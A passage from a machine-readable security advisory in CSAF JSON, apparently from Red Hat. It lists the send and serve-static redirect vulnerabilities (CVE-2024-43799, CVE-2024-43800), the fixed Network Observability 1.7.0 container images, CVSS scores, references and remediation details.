"system_name": "Red Hat Bugzilla ID",
"text": "2311153"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the Send library. This vulnerability allows remote code execution via untrusted input passed to the SendStream.redirect() function.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "send: Code Execution Vulnerability in Send Library",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-43799"
},
{
"category": "external",
"summary": "RHBZ#2311153",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311153"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-43799",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43799"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-43799",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43799"
},
{
"category": "external",
"summary": "https://github.com/pillarjs/send/commit/ae4f2989491b392ae2ef3b0015a019770ae65d35",
"url": "https://github.com/pillarjs/send/commit/ae4f2989491b392ae2ef3b0015a019770ae65d35"
},
{
"category": "external",
"summary": "https://github.com/pillarjs/send/security/advisories/GHSA-m6fv-jmcg-4jfg",
"url": "https://github.com/pillarjs/send/security/advisories/GHSA-m6fv-jmcg-4jfg"
}
],
"release_date": "2024-09-10T15:15:17.727000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-22T01:05:39+00:00",
"details": "For details on how to apply this update, refer to: \n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:8014"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.0,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "send: Code Execution Vulnerability in Send Library"
},
{
"cve": "CVE-2024-43800",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"discovery_date": "2024-09-10T15:30:33.631718+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2311154"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in serve-static. This issue may allow the execution of untrusted code via passing sanitized yet untrusted user input to redirect().",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "serve-static: Improper Sanitization in serve-static",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-43800"
},
{
"category": "external",
"summary": "RHBZ#2311154",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311154"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-43800",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43800"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-43800",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43800"
},
{
"category": "external",
"summary": "https://github.com/expressjs/serve-static/commit/0c11fad159898cdc69fd9ab63269b72468ecaf6b",
"url": "https://github.com/expressjs/serve-static/commit/0c11fad159898cdc69fd9ab63269b72468ecaf6b"
},
{
"category": "external",
"summary": "https://github.com/expressjs/serve-static/commit/ce730896fddce1588111d9ef6fdf20896de5c6fa",
"url": "https://github.com/expressjs/serve-static/commit/ce730896fddce1588111d9ef6fdf20896de5c6fa"
},
{
"category": "external",
"summary": "https://github.com/expressjs/serve-static/security/advisories/GHSA-cm22-4g7w-348p",
"url": "https://github.com/expressjs/serve-static/security/advisories/GHSA-cm22-4g7w-348p"
}
],
"release_date": "2024-09-10T15:15:17.937000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-22T01:05:39+00:00",
"details": "For details on how to apply this update, refer to: \n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
